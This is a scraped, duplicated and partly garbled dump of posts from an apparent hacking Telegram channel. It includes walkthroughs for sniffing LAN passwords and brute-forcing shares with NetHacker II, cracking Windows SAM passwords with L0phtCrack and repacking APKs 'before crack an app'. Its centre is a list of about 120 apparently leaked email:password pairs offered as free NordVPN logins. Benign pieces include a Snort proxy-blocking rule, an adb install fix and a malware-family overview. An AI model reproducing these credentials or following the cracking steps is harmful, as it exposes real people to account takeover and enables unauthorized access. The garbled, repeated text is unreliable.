β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦fast cracking guide :
A) Network Assassin II (English name: NetHacker II)
> Cyber ββAssassin is a Chinese network security detection software designed by Tianxing for security professionals. It can easily search out the shared hosts in the local area network, and then scan the shared resources of the shared server.
> Its sniffer function can also intercept the passwords of POP3, FTP, Telnet services used in the local area network.
> Now the broadband of the community is also a type of local area network, and the network assassin can do a good job.
> After the software is downloaded and decompressed, double-click the main program nethacker.exe to open the network assassin. Select the "Search Shared Host" command under "Host Resources", then enter the IP address range you want to scan, and then click the "Start Search" button to search for the host with the share.
> After the search is completed, it will be in the lower left of the main interface The search results are displayed on the side. (If there are no search results, you can try to turn off your personal firewall). Select the corresponding host in the lower left corner and expand it, right-click the mouse button in the corresponding shared resource, "map the network hard disk" of the directory to be accessed, so that the corresponding directory of the remote computer can be opened in "My Computer" .
> If the local computer has a shared password set, you can use the password guessing solution built into the network assassin to crack. Right-click the mouse in the specified shared resource and select "Share Guessing Machine" in the pop-up menu. Before you click "Start Guessing", you must set the correct dictionary. This is the key to success or failure.
> Now you can choose Define the appropriate password character set and combination method and password length.
> In addition, the network assassin also integrates some related network tools, including IP and host name converters, Finger client query tools, host port scanning tools, host finder, domain name finder, Telnet client program, etc. You can view the network status and your own IP.
π¦fast cracking guide :
A) Network Assassin II (English name: NetHacker II)
> Cyber ββAssassin is a Chinese network security detection software designed by Tianxing for security professionals. It can easily search out the shared hosts in the local area network, and then scan the shared resources of the shared server.
> Its sniffer function can also intercept the passwords of POP3, FTP, Telnet services used in the local area network.
> Now the broadband of the community is also a type of local area network, and the network assassin can do a good job.
> After the software is downloaded and decompressed, double-click the main program nethacker.exe to open the network assassin. Select the "Search Shared Host" command under "Host Resources", then enter the IP address range you want to scan, and then click the "Start Search" button to search for the host with the share.
> After the search is completed, it will be in the lower left of the main interface The search results are displayed on the side. (If there are no search results, you can try to turn off your personal firewall). Select the corresponding host in the lower left corner and expand it, right-click the mouse button in the corresponding shared resource, "map the network hard disk" of the directory to be accessed, so that the corresponding directory of the remote computer can be opened in "My Computer" .
> If the local computer has a shared password set, you can use the password guessing solution built into the network assassin to crack. Right-click the mouse in the specified shared resource and select "Share Guessing Machine" in the pop-up menu. Before you click "Start Guessing", you must set the correct dictionary. This is the key to success or failure.
> Now you can choose Define the appropriate password character set and combination method and password length.
> In addition, the network assassin also integrates some related network tools, including IP and host name converters, Finger client query tools, host port scanning tools, host finder, domain name finder, Telnet client program, etc. You can view the network status and your own IP.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Cracking tip 2 :
> Snadboy's Revelation
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) SnadBoy's Revelation This is a small and powerful password revealing tool that can view "*********" passwords in Windows, including those saved by some applications (such as mail client programs, FTP programs, etc.) "********" password, after downloading and installing the software, just drag the left button of the mouse to the cross box, and then the password will be displayed.
2) It is much faster than powerful cracking software. (Xiaorong's "Streamer" is also a cracking tool that hackers like to use. It is both a scanning software with powerful functions and powerful cracking and attacking functions.)
3) L0phtCrack4.0 (referred to as LC4)
> LC4 is currently the most popular Windows cracking tool. This tool can be used to crack passwords from Sam files where passwords are saved. For the case where Sam files can be obtained, choosing it is the best way to obtain the login password of the other party.
> It also has the function of importing passwords locally and remotely.
> Open LC4, and create a new task, and then click "Import (IMPORT)" | "Import from SAM file" to open the SAM file waiting to be cracked. At this time LC4 will automatically analyze this file and display the user name in the file. Then click "Begin Audit" in "Session" to start cracking the password. If the password is not very complicated, the result will be available in a short time.
> If the cracking fails to produce results, you can select "Cracking Options" under "Tasks", select a more comprehensive password list, and activate functional mode and brute force mode cracking, then select "Restart Cracking Command" under the "Task" column, if It is a 6-digit password, and the results will be available soon.
> https://sectools.org/tool/l0phtcrack/
writen by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Cracking tip 2 :
> Snadboy's Revelation
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) SnadBoy's Revelation This is a small and powerful password revealing tool that can view "*********" passwords in Windows, including those saved by some applications (such as mail client programs, FTP programs, etc.) "********" password, after downloading and installing the software, just drag the left button of the mouse to the cross box, and then the password will be displayed.
2) It is much faster than powerful cracking software. (Xiaorong's "Streamer" is also a cracking tool that hackers like to use. It is both a scanning software with powerful functions and powerful cracking and attacking functions.)
3) L0phtCrack4.0 (referred to as LC4)
> LC4 is currently the most popular Windows cracking tool. This tool can be used to crack passwords from Sam files where passwords are saved. For the case where Sam files can be obtained, choosing it is the best way to obtain the login password of the other party.
> It also has the function of importing passwords locally and remotely.
> Open LC4, and create a new task, and then click "Import (IMPORT)" | "Import from SAM file" to open the SAM file waiting to be cracked. At this time LC4 will automatically analyze this file and display the user name in the file. Then click "Begin Audit" in "Session" to start cracking the password. If the password is not very complicated, the result will be available in a short time.
> If the cracking fails to produce results, you can select "Cracking Options" under "Tasks", select a more comprehensive password list, and activate functional mode and brute force mode cracking, then select "Restart Cracking Command" under the "Task" column, if It is a 6-digit password, and the results will be available soon.
> https://sectools.org/tool/l0phtcrack/
writen by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Use adb shell and pm to install the apk package to the Android phone :
t.me/UndercodeTesting
1) After installing Android Studio, adb is usually in / Users / exchen / Library / Android / sdk / platform-tools directory
2) Set the environment variables or switch to the directory where adb is located, execute adb devices to view the devices connected to the machine, the command is as follows:
./adb devices
3) List of devices attached
0123456789ABCDEF device
emulator-5554 device
1
2
3
.....
4) ./adb devices
List of devices attached
0123456789ABCDEF device
emulator-5554 device
5) You can see that the above information shows that two devices are connected, one is a real machine and the other is an emulator. Since two devices need to specify the target device when performing operations, such as installing apk, the command is as follows:
> ./adb -s 0123456789ABCDEF install ~/Downloads/test.apk
Performing Push Install
adb: error: failed to copy '/Users/exchen/Downloads/test.apk' to '/data/local/tmp/test.apk': couldn't read from device
/Users/momo/Downloads/test.apk: 0 files pushed. 92.5 MB/s (131056 bytes in 0.001s)
Β» so continue with
> ./adb -s 0123456789ABCDEF install ~/Downloads/test.apk
Performing Push Install
adb: error: failed to copy '/Users/exchen/Downloads/test.apk' to '/data/local/tmp/test.apk': couldn't read from device
/Users/momo/Downloads/test.apk: 0 files pushed. 92.5 MB/s (131056 bytes in 0.001s)
π¦At this point, we see that the installation failed because the upload of the apk package to the / data / local / tmp / directory failed. Execute the adb shell and try to execute chmod to grant permissions, but the prompt denies access. The information is as follows:
> ./adb -s 0123456789ABCDEF shell
shell@Coolpad5367:/ $ chmod -R 755 data
Unable to chmod data: Permission denied
π¦THE FIX :
> No way, it seems that this directory has no permission to read and write, try to push test.apk to the SD card, the command is as follows:
1) ./adb -s 0123456789ABCDEF push ~/Downloads/test.apk /sdcard
2) If the push is successful, the SD card has read and write permissions. On the phone, try to click on the file management to install, but the installation button is gray and cannot be clicked. Finally, try to install using the pm command, the command is as follows:
> ./adb shell
shell@Coolpad5367:/ chmod 755 /sdcard/test.apk
shell@Coolpad5367:/ $ pm install -f /sdcard/test.apk
pkg: /sdcard/test.apk
Success
writen by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Use adb shell and pm to install the apk package to the Android phone :
t.me/UndercodeTesting
1) After installing Android Studio, adb is usually in / Users / exchen / Library / Android / sdk / platform-tools directory
2) Set the environment variables or switch to the directory where adb is located, execute adb devices to view the devices connected to the machine, the command is as follows:
./adb devices
3) List of devices attached
0123456789ABCDEF device
emulator-5554 device
1
2
3
.....
4) ./adb devices
List of devices attached
0123456789ABCDEF device
emulator-5554 device
5) You can see that the above information shows that two devices are connected, one is a real machine and the other is an emulator. Since two devices need to specify the target device when performing operations, such as installing apk, the command is as follows:
> ./adb -s 0123456789ABCDEF install ~/Downloads/test.apk
Performing Push Install
adb: error: failed to copy '/Users/exchen/Downloads/test.apk' to '/data/local/tmp/test.apk': couldn't read from device
/Users/momo/Downloads/test.apk: 0 files pushed. 92.5 MB/s (131056 bytes in 0.001s)
Β» so continue with
> ./adb -s 0123456789ABCDEF install ~/Downloads/test.apk
Performing Push Install
adb: error: failed to copy '/Users/exchen/Downloads/test.apk' to '/data/local/tmp/test.apk': couldn't read from device
/Users/momo/Downloads/test.apk: 0 files pushed. 92.5 MB/s (131056 bytes in 0.001s)
π¦At this point, we see that the installation failed because the upload of the apk package to the / data / local / tmp / directory failed. Execute the adb shell and try to execute chmod to grant permissions, but the prompt denies access. The information is as follows:
> ./adb -s 0123456789ABCDEF shell
shell@Coolpad5367:/ $ chmod -R 755 data
Unable to chmod data: Permission denied
π¦THE FIX :
> No way, it seems that this directory has no permission to read and write, try to push test.apk to the SD card, the command is as follows:
1) ./adb -s 0123456789ABCDEF push ~/Downloads/test.apk /sdcard
2) If the push is successful, the SD card has read and write permissions. On the phone, try to click on the file management to install, but the installation button is gray and cannot be clicked. Finally, try to install using the pm command, the command is as follows:
> ./adb shell
shell@Coolpad5367:/ chmod 755 /sdcard/test.apk
shell@Coolpad5367:/ $ pm install -f /sdcard/test.apk
pkg: /sdcard/test.apk
Success
writen by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ before crack an app :About Android Apk decompilation and then compile back can not install normally
1) After using apktool to decompile the apk, compile it back, and find that it cannot be installed normally, but use ApkToolKitV3.0 to decompile, and then compile it back to install normally.
2) The main reason is that using apktool to compile back without a signature. So it cannot be installed, and ApkToolKitV3. 0 Compile back and sign it.
3)_After compiling with apktool, then sign with signapk.jar.
Java -jar signapk.jar testkey.x509.pem testkey.pk8 test.apk test-signed.apk The
>following is packaged The apktool, which contains signapk.jar, can be used directly
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ before crack an app :About Android Apk decompilation and then compile back can not install normally
1) After using apktool to decompile the apk, compile it back, and find that it cannot be installed normally, but use ApkToolKitV3.0 to decompile, and then compile it back to install normally.
2) The main reason is that using apktool to compile back without a signature. So it cannot be installed, and ApkToolKitV3. 0 Compile back and sign it.
3)_After compiling with apktool, then sign with signapk.jar.
Java -jar signapk.jar testkey.x509.pem testkey.pk8 test.apk test-signed.apk The
>following is packaged The apktool, which contains signapk.jar, can be used directly
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Android Android APK decompile reverse by undercode :
> The reverse of the Android APK program is simpler than the reverse of the WindowsPE file:
π¦ ππΌππ πππΈβπ :
1) The Android APK program is actually a zip, which can be opened with winrar. After decompression, you will see the familiar directory, as well as the AndroidManifest.xml file, various resources and image
2) xml is opened with notepad, you will see garbled characters, so you need to use AXMLPrinter2.jar tool to process it, the command is as follows:
java -jar AXMLPrinter2.jar AndroidManifest.xml > AndroidManifest.txt
java -jar AXMLPrinter2.jar AndroidManifest.xml > AndroidManifest.txt
3) Open AndroidManifest.txt at this time, you will see that it is similar to the source code, and there is no garbled code.
> All the .java code of 3.APK is compiled into the classes.dex file, so if you want to know the operation process and specific functions of the program, you must decompile this file and use the baksmali.jar tool
> java -jar baksmali.jar -o classout/ classes.dex
> java -jar baksmali.jar -o classout/ classes.dex
4) After the execution is complete, generate a classout directory, go to find the android directory, .smali, corresponds to the code of .java, let's look at the code in .small, although it is not the standard java code, but it is very simple after looking at the habits , At least much simpler than Windows assembly ...
5) Finally, after decompilation, we can change the code to change the resources. After the modification, we have to compile back and use the smali.jar tool
> java -jar smali.jar classout/ -o classes.dex
> java -jar smali.jar classout/ -o classes.dex
6) After this is done, then plug it into the apk, so that the program can still run, hehe!
7) Sometimes AXMLPrinter2.jar may not be able to handle xml well and will report an error. It is said that because the manifest file minSdkVersion is greater than 7, we can use APKTool
APKTool is very simple, that is, three files (aapt.exe, apktool.bat, apktool.jar )
> apktool d <file.apk> <dir> /
apktool b <dir> //
apktool d <file.apk> <dir> /
apktool b <dir> //
writen by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Android Android APK decompile reverse by undercode :
> The reverse of the Android APK program is simpler than the reverse of the WindowsPE file:
π¦ ππΌππ πππΈβπ :
1) The Android APK program is actually a zip, which can be opened with winrar. After decompression, you will see the familiar directory, as well as the AndroidManifest.xml file, various resources and image
2) xml is opened with notepad, you will see garbled characters, so you need to use AXMLPrinter2.jar tool to process it, the command is as follows:
java -jar AXMLPrinter2.jar AndroidManifest.xml > AndroidManifest.txt
java -jar AXMLPrinter2.jar AndroidManifest.xml > AndroidManifest.txt
3) Open AndroidManifest.txt at this time, you will see that it is similar to the source code, and there is no garbled code.
> All the .java code of 3.APK is compiled into the classes.dex file, so if you want to know the operation process and specific functions of the program, you must decompile this file and use the baksmali.jar tool
> java -jar baksmali.jar -o classout/ classes.dex
> java -jar baksmali.jar -o classout/ classes.dex
4) After the execution is complete, generate a classout directory, go to find the android directory, .smali, corresponds to the code of .java, let's look at the code in .small, although it is not the standard java code, but it is very simple after looking at the habits , At least much simpler than Windows assembly ...
5) Finally, after decompilation, we can change the code to change the resources. After the modification, we have to compile back and use the smali.jar tool
> java -jar smali.jar classout/ -o classes.dex
> java -jar smali.jar classout/ -o classes.dex
6) After this is done, then plug it into the apk, so that the program can still run, hehe!
7) Sometimes AXMLPrinter2.jar may not be able to handle xml well and will report an error. It is said that because the manifest file minSdkVersion is greater than 7, we can use APKTool
APKTool is very simple, that is, three files (aapt.exe, apktool.bat, apktool.jar )
> apktool d <file.apk> <dir> /
apktool b <dir> //
apktool d <file.apk> <dir> /
apktool b <dir> //
writen by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ NEW 210 TESTED NORDVPN
1 -2 - 3 YEARS LOGIN AND SEND ME PICTURE
> may 2-3 accounts not working because rich max logins ignore them
colin.bard43@hotmail.com:Chester13
hamilton93111@yahoo.com:amanda931
jziemba2013@gmail.com:yankees1
kkennedy22@gmail.com:Duff0022
mdcopestake@gmail.com:lollipop
narrow_path101@yahoo.com:ironchef09
natebegonia@yahoo.com:shifty4u
nicholas.hammer1@gmail.com:Nick4477
nickelpfeiffer@gmail.com:blink182
oliver.turrell@gmail.com:millwall100
parkerh101@gmail.com:05251994
whatsthesignal@gmail.com:smithers
wonaboveu@gmail.com:01durango
alec.maybarduk@gmail.com:Tony1989
aniya456@icloud.com:Samari01
autumnjames01@icloud.com:autumn01
ch33ky1974@gmail.com:Madison2007
christiansravn@yahoo.de:Marcel12
clmisp@yahoo.com:Un1versa1
csinghavong@gmail.com:nothing123
glowther@me.com:Builder7
govannig88@gmail.com:Tahoe888
hudsonjordan682@gmail.com:ilovebaseball
ian.felter@yahoo.com:Rockstar1
jaderquist@yahoo.com:Fender1969
jdeaugu@gmail.com:Banker11
jermierio@gmail.com:Fatz3289
jowaskett@hotmail.com:Rainbow1982
lgaddis24@gmail.com:5568Sasha
lilly.byrne12@yahoo.com:texasstars
pacobden1@bigpond.com:97966695
pho3nix182@gmail.com:master182
shawka3105@gmail.com:korkycat2
t.bergervoet@gmail.com:Media321
tbloomq595@aol.com:Bloomie1
tfabre2@gmail.com:zoloft123
thor101276@gmail.com:Tazz9314
tom.goodens@gmail.com:Bugatti12
zane_heavner@yahoo.com:Hobbs123
a.david227@gmail.com:bumba123
angelorios@me.com:1hlo9b10
basham02@msn.com:Starwars1
borthwickchris@hotmail.com:Thought12
cellinghausen@gmail.com:polo1234
chasev@live.com:Giants4848
co_wrx@hotmail.com:karen001
dsvettrus@hotmail.com:Sierra13
gmoney_94590@yahoo.com:Lowride1
jakki.o.brien@hotmail.co.uk:Sophie01
jeffhaynes619@gmail.com:buzzer
jensterle.anze@gmail.com:anze0255
johnjrreil@gmail.com:Archie12
doogiemc1966@gmail.com:Charlton1905
djmiosibuffalo@gmail.com:monkmonk1
jerichosantiago1@gmail.com:23rmitkb
henrydeuel@gmail.com:hd522194
stefan.schwindl@gmx.de:P3294z4h
johnjcharlesworth@gmail.com:Pokemon123
priyamshah95@gmail.com:chikoo40
joshlambert1590@yahoo.com:Brahma25
tripp.welge@gmail.com:thurlow84
clara357@gmail.com:horse1021
govindarumi@gmail.com:Twenty20
www.ducker60@gmail.com:Michon26
mickwooly@hotmail.com:3manc1manu
gregoire.caboche@gmail.com:Biniouse123
justin.joon.yang@gmail.com:4hamashika
calpurnia53@gmail.com:lrbk53019
christianpmorgan@live.com:Mexico08
mdking97@gmail.com:9k12ak12337
fabi_warcrafgt@hotmail.com:fgt123war321
joe.saouma@gmail.com:11097c4da
dhanishs.soni@gmail.com:dhanish9199
mmcyj1@aol.com:skippy12
nkatakura1@gmail.com:kata73247
cherise-mayte@hotmail.com:Lincoln1
lewisproctor7@gmail.com:rooney07
crow.stephen@gmail.com:savior11
wings_ting@hotmail.com:y0430232
nehmerabih@hotmail.com:03953538
kajcampbell@sbcglobal.net:kajl1040
Lucas@saugmann.dk:Farogmor123
kobilee98@hotmail.com:Delldell12
khatib_elboss1@hotmail.com:elhenry14
horsejay2003@gmail.com:Swimmer4
thecheeseapache@hotmail.com:79264833pc
treyturner74@gmail.com:Corvette14
adam_bonham4@hotmail.com:zero1644
berjali@gmail.com:maryama2011
spmantor@yahoo.com:spm060587
benedict3121@gmail.com:wanderlust
ericklanda423@gmail.com:171623El
razielphisher@gmail.com:Lancas7er
aaronjbreuer@yahoo.com:k2M93pyW
sean-peck@hotmail.com:sp16ae78
torabi142003@yahoo.de:Midda1350
terrynwf@hotmail.com:selina00
difranco.michael@gmail.com:Michael1
christopherconrell@gmail.com:kansas9904
alexsander-veiby@hotmail.com:Banjokazooie99
egarstad@gmail.com:VutRa4aW
zachsaddress03@gmail.com:Zach2003
sethdymoke@gmail.com:Laxbro10
curtgaebriel@gmail.com:Aiypwzqp1996
josef.bremberger@googlemail.com:Avalanche123
john.van.krieken@live.com:andrew16
zacottaway@gmail.com:Starwars10
mikewsm.15@gmail.com:Monster15
alvaradonestor7@gmail.com:Buddha420
Jalal.X@gmail.com:Kenshin13
alfredocmarques@gmail.com:2am707mr
nicolas.dontschev@gmail.com:plumeplume0
prathapan@gmail.com:Sabara12
autisticsheep.com@gmail.com:Soccer03
dustin_mustach@yahoo.com:Dnmdaman123
bonurozdemir@gmail.com:17agustoS
bakobanmana@gmail.com:Phantom1
mattmix@bluemavid.com:visV5kapr3
kevinscripture@hotmail.com:Eyes2020
ruth.ruckle@gmail.com:children3
π¦ NEW 210 TESTED NORDVPN
1 -2 - 3 YEARS LOGIN AND SEND ME PICTURE
> may 2-3 accounts not working because rich max logins ignore them
colin.bard43@hotmail.com:Chester13
hamilton93111@yahoo.com:amanda931
jziemba2013@gmail.com:yankees1
kkennedy22@gmail.com:Duff0022
mdcopestake@gmail.com:lollipop
narrow_path101@yahoo.com:ironchef09
natebegonia@yahoo.com:shifty4u
nicholas.hammer1@gmail.com:Nick4477
nickelpfeiffer@gmail.com:blink182
oliver.turrell@gmail.com:millwall100
parkerh101@gmail.com:05251994
whatsthesignal@gmail.com:smithers
wonaboveu@gmail.com:01durango
alec.maybarduk@gmail.com:Tony1989
aniya456@icloud.com:Samari01
autumnjames01@icloud.com:autumn01
ch33ky1974@gmail.com:Madison2007
christiansravn@yahoo.de:Marcel12
clmisp@yahoo.com:Un1versa1
csinghavong@gmail.com:nothing123
glowther@me.com:Builder7
govannig88@gmail.com:Tahoe888
hudsonjordan682@gmail.com:ilovebaseball
ian.felter@yahoo.com:Rockstar1
jaderquist@yahoo.com:Fender1969
jdeaugu@gmail.com:Banker11
jermierio@gmail.com:Fatz3289
jowaskett@hotmail.com:Rainbow1982
lgaddis24@gmail.com:5568Sasha
lilly.byrne12@yahoo.com:texasstars
pacobden1@bigpond.com:97966695
pho3nix182@gmail.com:master182
shawka3105@gmail.com:korkycat2
t.bergervoet@gmail.com:Media321
tbloomq595@aol.com:Bloomie1
tfabre2@gmail.com:zoloft123
thor101276@gmail.com:Tazz9314
tom.goodens@gmail.com:Bugatti12
zane_heavner@yahoo.com:Hobbs123
a.david227@gmail.com:bumba123
angelorios@me.com:1hlo9b10
basham02@msn.com:Starwars1
borthwickchris@hotmail.com:Thought12
cellinghausen@gmail.com:polo1234
chasev@live.com:Giants4848
co_wrx@hotmail.com:karen001
dsvettrus@hotmail.com:Sierra13
gmoney_94590@yahoo.com:Lowride1
jakki.o.brien@hotmail.co.uk:Sophie01
jeffhaynes619@gmail.com:buzzer
jensterle.anze@gmail.com:anze0255
johnjrreil@gmail.com:Archie12
doogiemc1966@gmail.com:Charlton1905
djmiosibuffalo@gmail.com:monkmonk1
jerichosantiago1@gmail.com:23rmitkb
henrydeuel@gmail.com:hd522194
stefan.schwindl@gmx.de:P3294z4h
johnjcharlesworth@gmail.com:Pokemon123
priyamshah95@gmail.com:chikoo40
joshlambert1590@yahoo.com:Brahma25
tripp.welge@gmail.com:thurlow84
clara357@gmail.com:horse1021
govindarumi@gmail.com:Twenty20
www.ducker60@gmail.com:Michon26
mickwooly@hotmail.com:3manc1manu
gregoire.caboche@gmail.com:Biniouse123
justin.joon.yang@gmail.com:4hamashika
calpurnia53@gmail.com:lrbk53019
christianpmorgan@live.com:Mexico08
mdking97@gmail.com:9k12ak12337
fabi_warcrafgt@hotmail.com:fgt123war321
joe.saouma@gmail.com:11097c4da
dhanishs.soni@gmail.com:dhanish9199
mmcyj1@aol.com:skippy12
nkatakura1@gmail.com:kata73247
cherise-mayte@hotmail.com:Lincoln1
lewisproctor7@gmail.com:rooney07
crow.stephen@gmail.com:savior11
wings_ting@hotmail.com:y0430232
nehmerabih@hotmail.com:03953538
kajcampbell@sbcglobal.net:kajl1040
Lucas@saugmann.dk:Farogmor123
kobilee98@hotmail.com:Delldell12
khatib_elboss1@hotmail.com:elhenry14
horsejay2003@gmail.com:Swimmer4
thecheeseapache@hotmail.com:79264833pc
treyturner74@gmail.com:Corvette14
adam_bonham4@hotmail.com:zero1644
berjali@gmail.com:maryama2011
spmantor@yahoo.com:spm060587
benedict3121@gmail.com:wanderlust
ericklanda423@gmail.com:171623El
razielphisher@gmail.com:Lancas7er
aaronjbreuer@yahoo.com:k2M93pyW
sean-peck@hotmail.com:sp16ae78
torabi142003@yahoo.de:Midda1350
terrynwf@hotmail.com:selina00
difranco.michael@gmail.com:Michael1
christopherconrell@gmail.com:kansas9904
alexsander-veiby@hotmail.com:Banjokazooie99
egarstad@gmail.com:VutRa4aW
zachsaddress03@gmail.com:Zach2003
sethdymoke@gmail.com:Laxbro10
curtgaebriel@gmail.com:Aiypwzqp1996
josef.bremberger@googlemail.com:Avalanche123
john.van.krieken@live.com:andrew16
zacottaway@gmail.com:Starwars10
mikewsm.15@gmail.com:Monster15
alvaradonestor7@gmail.com:Buddha420
Jalal.X@gmail.com:Kenshin13
alfredocmarques@gmail.com:2am707mr
nicolas.dontschev@gmail.com:plumeplume0
prathapan@gmail.com:Sabara12
autisticsheep.com@gmail.com:Soccer03
dustin_mustach@yahoo.com:Dnmdaman123
bonurozdemir@gmail.com:17agustoS
bakobanmana@gmail.com:Phantom1
mattmix@bluemavid.com:visV5kapr3
kevinscripture@hotmail.com:Eyes2020
ruth.ruckle@gmail.com:children3
π¦ NEW 210 TESTED NORDVPN
1 -2 - 3 YEARS LOGIN AND SEND ME PICTURE
> may 2-3 accounts not working because rich max logins ignore them & send me screanshoat :)
1 -2 - 3 YEARS LOGIN AND SEND ME PICTURE
> may 2-3 accounts not working because rich max logins ignore them & send me screanshoat :)
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Network configuration-Prevent users from browsing using external proxies :
> Some background knowledge:
1) HTTP / 1.0 protocol defines web server and When the client uses a proxy, in the
HTTP request and response header, use Via: to identify the proxy server used to prevent the
server loop;
2) snort is an open source IDS (intrusion detection system) that can be used Host or network IDS. With many IDS
rules, it can perform pattern recognition and matching on the captured (ip, tcp, udp, icmp) packets, and can generate corresponding records.
3) libnet is open source software that can be used as a network protocol / packet generator.
4) The TCP / IP network is a packet-switched network.
5) Snort also has the function of generating IP packets using the libnet library. You can interrupt the TCP connection by issuing a TCP_RESET packet.
π¦ Prerequisites:
1) Snort runs on the route (linux) or through the port mirror function of the switch, runs on the same
network segment of the route
π¦ Implementation:
1) compile snort with flexresp (flex response) feature
2) Define snort rules:
alert tcp $ HOME_NET any <> $ EXTER_NET 80 (msg: "block proxy"; uricontent: "Via:"; resp: rst_all;)
π¦ Effect:
Internal network users can browse external websites normally. If the internal user βs browser is configured with an external proxy, the
HTTP REQUEST and RESPONSE headers will include Via: ... characters, and snort rules will capture this connection, and then
Send RST packets to client and server sockets. In this way, the TCP connection is terminated.
written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Network configuration-Prevent users from browsing using external proxies :
> Some background knowledge:
1) HTTP / 1.0 protocol defines web server and When the client uses a proxy, in the
HTTP request and response header, use Via: to identify the proxy server used to prevent the
server loop;
2) snort is an open source IDS (intrusion detection system) that can be used Host or network IDS. With many IDS
rules, it can perform pattern recognition and matching on the captured (ip, tcp, udp, icmp) packets, and can generate corresponding records.
3) libnet is open source software that can be used as a network protocol / packet generator.
4) The TCP / IP network is a packet-switched network.
5) Snort also has the function of generating IP packets using the libnet library. You can interrupt the TCP connection by issuing a TCP_RESET packet.
π¦ Prerequisites:
1) Snort runs on the route (linux) or through the port mirror function of the switch, runs on the same
network segment of the route
π¦ Implementation:
1) compile snort with flexresp (flex response) feature
2) Define snort rules:
alert tcp $ HOME_NET any <> $ EXTER_NET 80 (msg: "block proxy"; uricontent: "Via:"; resp: rst_all;)
π¦ Effect:
Internal network users can browse external websites normally. If the internal user βs browser is configured with an external proxy, the
HTTP REQUEST and RESPONSE headers will include Via: ... characters, and snort rules will capture this connection, and then
Send RST packets to client and server sockets. In this way, the TCP connection is terminated.
written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Network configuration-the arrival of home network by undercode:
> Today, the number of home PCs has inevitably exceeded one. Usually, when we upgrade us After the machine, or after giving the child one, or the wife bringing back one to work, we have more than one computer at home. Anyway, in the end we will have a bunch of machines.
π¦ ππΌππ πππΈβπ :
The following is a list of the functions that the network solution has, including Common home operating systems and two uncommon network solutions-Linux and Microsoft NT:
Linux Unix NT Win95 Mac OS / 2
Printer services xxxxxx
File server / sharing x * * * * *
Mail server x * * *--
Domain Name Server xx * * * *
Web Server xx * * * *
Firewall x * * *--
Routing xxx---
Gateway xxx---
Internet xxxxxx
Ethernet xxxxxx
Token Ring x * * * * *
Arcnet x * * * * *
Framerelay x * *---
ISDN x * * *--
PPP xxxxxx
SLIP xxxxxx
TCP / IP xxxxxx
X.25 x * * * * *
IPX (Novell Netware) xxxx * *
SMB (Windows network) xxxx * *
Appletalk x * * * x *
NFS xx * * * *
------------ -------------------------------------------------- ------------------
x Supported by the system itself
* Need additional support
-not supported
After comparison of chart functions, some systems have been disregarded. If you are not using this It βs a pity, but it βs best to discuss with the OEM, since even they all recommend you to replace it. In addition, all kinds of UNIX are included in a UNIX column, except Linux.
written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Network configuration-the arrival of home network by undercode:
> Today, the number of home PCs has inevitably exceeded one. Usually, when we upgrade us After the machine, or after giving the child one, or the wife bringing back one to work, we have more than one computer at home. Anyway, in the end we will have a bunch of machines.
π¦ ππΌππ πππΈβπ :
The following is a list of the functions that the network solution has, including Common home operating systems and two uncommon network solutions-Linux and Microsoft NT:
Linux Unix NT Win95 Mac OS / 2
Printer services xxxxxx
File server / sharing x * * * * *
Mail server x * * *--
Domain Name Server xx * * * *
Web Server xx * * * *
Firewall x * * *--
Routing xxx---
Gateway xxx---
Internet xxxxxx
Ethernet xxxxxx
Token Ring x * * * * *
Arcnet x * * * * *
Framerelay x * *---
ISDN x * * *--
PPP xxxxxx
SLIP xxxxxx
TCP / IP xxxxxx
X.25 x * * * * *
IPX (Novell Netware) xxxx * *
SMB (Windows network) xxxx * *
Appletalk x * * * x *
NFS xx * * * *
------------ -------------------------------------------------- ------------------
x Supported by the system itself
* Need additional support
-not supported
After comparison of chart functions, some systems have been disregarded. If you are not using this It βs a pity, but it βs best to discuss with the OEM, since even they all recommend you to replace it. In addition, all kinds of UNIX are included in a UNIX column, except Linux.
written by Undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ TOP ACTIVE MALWARES IN 2020 :
T.me/UndercodeTesting
1) Emotet is a modular infostealer that downloads or drops banking trojans. It can be delivered through either malicious download links or attachments, such as PDF or macro-enabled Word documents. Emotet also incorporates spreader modules in order to propagate throughout a network. In December 2018, Emotet was observed using a new module that exfiltrates email content.
2) WannaCry is a ransomware cryptoworm using the EternalBlue exploit to spread via SMB protocol. Version 1.0 has a βkillswitchβ domain, which stops the encryption process.
3) Kovter is a fileless click fraud malware and a downloader that evades detection by hiding in registry keys. Reporting indicates that Kovter can have backdoor capabilities and uses hooks within certain APIs for persistence.
4) ZeuS is a modular banking trojan which uses keystroke logging to compromise victim credentials when the user visits a banking website. Since the release of the ZeuS source code in 2011, many other malware variants adopted parts of itβs codebase, which means that events classified as ZeuS may actually be other malware using parts of the ZeuS code.
5) Dridex is a malware banking variant that uses malicious macros in Microsoft Office with either malicious embedded links or attachments. Dridex is disseminated via malspam campaigns
6) IcedID is a modular banking Trojan targeting banks, payment card providers, and payroll websites. IcedID utilizes the same distribution infrastructure as Emotet. The malware can monitor a victimβs online activity by setting up local proxies for traffic tunneling, employing web injection and redirection attacks. It propagates across a network by infecting terminal servers
7) Gh0st is a RAT used to control infected endpoints. Gh0st is dropped by other malware to create a backdoor into a device that allows an attacker to fully control the infected device
